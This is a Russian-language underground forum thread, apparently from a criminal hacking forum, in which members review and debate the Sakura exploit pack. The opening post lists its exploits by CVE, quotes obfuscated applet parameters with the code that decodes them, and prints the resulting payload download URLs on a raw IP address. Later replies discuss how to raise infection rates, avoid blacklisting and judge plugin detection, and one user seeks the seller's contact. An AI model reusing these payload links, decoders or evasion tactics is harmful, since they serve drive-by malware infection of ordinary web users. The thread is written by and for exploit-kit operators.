Статья Sakura exploit pack

[GOONER]

​

Всем привет! Сегодня решил опубликовать небольшой обзор новой связки сплоитов Sakura exploit pack!
Хотя я уже давно видел топ об аренде , и скрины статистики на блоге xylibox, но только недавно наткнулся на живой сэмпл в трекере
Итак открыв стандартный набор утилит для ковыряния связок, начнемс наше исследование
под User-agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)

Спойлер: 50

toptours.grantandamy.net/index.php?showtopic=686579

получаем выдачу связки index.txt

Сразу же возникают вопросы-а где же проверка уязвимых версий плагинов?Зачем лишний раз палить сплоиты?
Возможно, лучше выдавать сплоиты средствами JavaScript?
Ладно, возьмемся за декод сплоентов, которые я поснимал:

lsff.pdf - libtiff CVE-2010-0188
rhin.jar - java rhino CVE-2011-3544
Loo.jar - java OBE CVE-2010-0840

Начнем с rhin.jar - как видим апплету передается параметр:

Спойлер: 50

<param name="dest" value="lxxt>337525<825=629<3pseh2tltCwls{jsvyqAvlmrs">

Это линк на скачку ехе, за его расшифровку отвечает участок кода:

Спойлер: 50

String uri = getParameter("delogolst".replace("logol", ""));
      String duri = "";
      for (int i = 0; i < uri.length(); ++i)
      {
        int rt = uri.charAt(i);
        rt -= 4;
        duri = duri + (char)rt;
      }

Декод на JS:

Спойлер: 50

 var uri="lxxt>337525<825=629<3pseh2tltCwls{jsvyqAvlmrs";
 var rt, i;
 var duri='';
 for (i = 0; i < uri.length; ++i) {
      rt =uri.charCodeAt(i);
      rt = rt- 4;
      duri = duri + String.fromCharCode(rt);
 }
 document.write(duri);

или на Java:

Спойлер: 50

String uri = "lxxt>337525<825=629<3pseh2tltCwls{jsvyqAsfi";
String duri = "";
for (int i = 0; i < uri.length(); ++i) {
   int rt = uri.charAt(i);
   rt -= 4;
   System.out.println(rt);
   duri = duri + (char)rt;
}
System.out.println(duri);

Получаем:

Спойлер: 50

hххp://31.184.192.58/load.php?showforum=rhino

Приступим к Loo.jar, тут также апплету передается шифрованный линк на скачку ехе

Спойлер: 50

<param name="dest" value="lxxt>337525<825=629<3pseh2tltCwls{jsvyqAsfi">

Спойлер: 50

      String ddswh = getParameter("dejjwst".replace("jjw", ""));
      String dddswh = "";
      for (int s = 0; s < ddswh.length(); ++s)
      {
        int jds = ddswh.charAt(s);
        jds -= 4;
        dddswh = dddswh + (char)jds;
      }

Тем же способом декодируем линк:

Спойлер: 50

hххp://31.184.192.58/load.php?showforum=obe

Далее в очереди - lsff.pdf
Для анализа будем использовать PDFStreamsDumper

Нас интересует 8 0 obj, который под флатом
Скрипт для декода pdfdec.js

Сам js в decoded.txt
ШК в либтифе поксорен

Вот, собственно, и всё.
===================================================================
P.S. Хотелось бы услышать мнения форумчан по поводу такого подхода в выдаче сплоитов.
===================================================================

Спойлер: 70

Файлы к обзору: ТУТ
pass:DaMaGeLaB

 

[Gdark]

Ну и зачем было разбирать =\

P.S. Хотелось бы услышать мнения форумчан по поводу такого подхода в выдаче сплоитов.

Выдача себя оправдала и приносит больший эффект нежели кривой плагиндетект.

 

[Ar3s]

И так же быстро палится? Мда, это профессиональный подход...

 

[lte]

И так же быстро палится? Мда, это профессиональный подход...

Ar3s это бред. Как быстро спалит зависит лишь от профессионализма криптора. У меня вот все клиенты крупные минимум 200к в сутки сливают, и при таком методе выдачи живут по 0лям чистыми около недели и пробив выше. А у кого-то и с плагин детектом палится уже через 2-3 часа... все относительно...
Во вторых сам скрипт плагин дектекта весит 30кб, что при выдачи сверху увеличивает ее размер до 70-150кб. Что сказывается на скорости загрузки и расшифровки выдачи, а соответственно на пробиве. А у некоторых еще JS крипты медленные и грузят браузер. А еще плагин детект не корректно сравнивает версии, в джаве есть альфа и бета версии еще, который детектятся как 1.6.0.30_a14.
Поэтому я считаю, что автор сакуры правильно сделал.

 

[TrueUser]

Имхо тут и разгребать то нечего было. Очередной тупой говнопак (((.
Прецендент с детектом плагинов - это актуально ибо многие браузеры при отсутствии у них на борту нужных плагинов орут об этом юзеру или вообще крэшат всю выдачу нах ))). Так что палка о двух концах.

 

[Gdark]

Имхо тут и разгребать то нечего было. Очередной тупой говнопак (((.

Сделай "умный" пак или хотя бы аргументировал.

Прецендент с детектом плагинов - это актуально ибо многие браузеры при отсутствии у них на борту нужных плагинов орут об этом юзеру или вообще крэшат всю выдачу нах ))). Так что палка о двух концах.

Если все чисто и все работает какая нафиг разница, что и как выдется. Я вот этого не пойму. Не вы же чистите. Сто лет выдавали так и выдают до сих пор. А вы дальше бх ничего не видите.

 

[lte]

Имхо тут и разгребать то нечего было. Очередной тупой говнопак (((.
Прецендент с детектом плагинов - это актуально ибо многие браузеры при отсутствии у них на борту нужных плагинов орут об этом юзеру или вообще крэшат всю выдачу нах ))). Так что палка о двух концах.

Отсутствие плагина, никак не может крешить выдачу. Вы чето преувеличиваете и мифы тут создаете...
Реальные замеры показывают, что пробив без плагин дектекта выше...
А чтобы не выдавалось тем у кого плагин не установлен можно проверять
navigator.JavaEnabled...
А плагин детект бывает, что не может определить версию джавы из-за просадок по пробиву...

 

[Ragnar]

Отсутствие плагиндетекта сделано для экономии времени, что вполне мб оправдано с учетом сео траффа, поэтому выпады в сторону автора немного неуместны, каждый сам решает за счет чего повысить пробив.

 

[Mr._Zed]

ИМХО, отсутствие плагин детекта здесь уместно, тем более, что Ксио заявлял о постоянных чистках. Хотелось бы услышать мнение хоть одного нынешнего клиента пака

 

[irvinedean]

can someone PM the sakura's author jid/icq to me ?

tq

 

[Gdark]

can someone PM the sakura's author jid/icq to me ?

tq

sakura's reception is closed

 

[Ar3s]

По просьбе автора - поднял хайд.

 

[TrueUser]

Может с запозданием но я поясню свой коммент.

Под плагиндетектом я НЕ подразумевал говноскрипт плагиндетекта который все кому не лень тыкают в выдачу и который палится всеми кому не лень (качается и так сказать "собирается" на каком то онлайн сервисе). Я имел ввиду проверку наличия плагинов как таковых. Когда люди сливают трафик с нормальных ресов, их заботит длительное наличие "фрейма" на страницах сайта, однако же если посетителей не имеющих (или отключивших) плагины pdf, java или flash будет напрягать постоянно выскакивающие мессаги о том, что мол де требуется такой то плагин будет явно не айс, а некоторые версии оперы вообще могут редиректить автоматом на страницы для установки этих плагинов без каких либо действий со стороны пользователя. Отсюда и частое снятие фрейма.

Если вы не можете написать нормальное быстрое КРОССБРАУЗЕРНОЕ определение наличия плагинов, это не значит что их определение есть зло в паке и оно снижает пробив. Пробив снижает говнокод!

Не надо тыкать в меня "написал бы сам", о моей компетенции в этом вопросе можно спросить у людей в компетенции которых, я надеюсь, вы не сомневаетесь.
Выдавать голые сплойты не есть ноухау, но есть хауноу и говорит лишь о нежелании автора разобраться в этом вопросе. Без обид ага )

Добавлено в [time]1336057289[/time]
"А чтобы не выдавалось тем у кого плагин не установлен можно проверять
navigator.JavaEnabled..."

Как известно сия фича не отражает реального состояния дел во многих браузерах, так что не отделаетесь ей так просто, а вот пробив уменьшить - это запросто.

 

[Gdark]

Я имел ввиду проверку наличия плагинов как таковых. Когда люди сливают трафик с нормальных ресов, их заботит длительное наличие "фрейма" на страницах сайта, однако же если посетителей не имеющих (или отключивших) плагины pdf, java или flash будет напрягать постоянно выскакивающие мессаги о том, что мол де требуется такой то плагин будет явно не айс, а некоторые версии оперы вообще могут редиректить автоматом на страницы для установки этих плагинов без каких либо действий со стороны пользователя. Отсюда и частое снятие фрейма.

специфика выдачи, определяется потребностями пользователей. поэтому если никому он не нужен был, то и незачем его подключать.

Если вы не можете написать нормальное быстрое КРОССБРАУЗЕРНОЕ определение наличия плагинов, это не значит что их определение есть зло в паке и оно снижает пробив. Пробив снижает говнокод!

можем. свое решение уже давно есть и предоставляется нуждающимся)

Выдавать голые сплойты не есть ноухау, но есть хауноу и говорит лишь о нежелании автора разобраться в этом вопросе. Без обид ага )

именно из-за "нежелания автора" связка получала пробив в разы больше других паков =) только потом все поняли или надо убирать плагиндетект(тот который с сайта и палится) или переписывать на более легкий.

А вообще за прошедшие пол года, много воды утекло, связка преобрела совершенно другой вид =)
Так что уже наверное не имеет смысла обсуждать то, чего нет.

 

[localhost]

именно из-за "нежелания автора" связка получала пробив в разы больше других паков =)

и в какие разы интересно он выше, клиентов предупреждать надо что твоя "cвязка" сует сплоиты без детекта плагинов , правильно сказал TrueUser, на объеме траффа важна живучесть фрейма, ты бы еще на браузер не чекал хули еще больше пробив был бы и скорость выше.По не палевности я бы поспорил каждый час стабильно домены в блек летят на твоем "паке", в сравнении с тем же найсом 3 дня ни один домен не спален.

 

[Gdark]

клиентов предупреждать надо что твоя "cвязка" сует сплоиты без детекта плагинов , правильно сказал TrueUser, на объеме траффа важна живучесть фрейма

на живучесть фрейма жалоб никогда не было, а про предупеждать клиентов это что-то из разряда "показывать сорсы надо всем клиентам и объснять каждую строчку".

ты бы еще на браузер не чекал хули еще больше пробив был бы и скорость выше.

если надо будет все так и сделаю, не беспокойтесь, вашего мнения не спрошу.

По не палевности я бы поспорил каждый час стабильно домены в блек летят на твоем "паке", в сравнении с тем же найсом 3 дня ни один домен не спален.

ну каждый час у меня не палятся =) так что ложная информация. никто не мешает вам пользоваться другими решениями.
очень похоже что я кому-то спать спокойно не даю=)

 

[Natx0]

Много умных людей отписалось в топе.

Я с позиции клиента могу сказать, что пробив за последний месяц, что берем сакуру, всреднем на 3-4% выше чем на чистом своем БХ - это на европейском траффе.

С ув.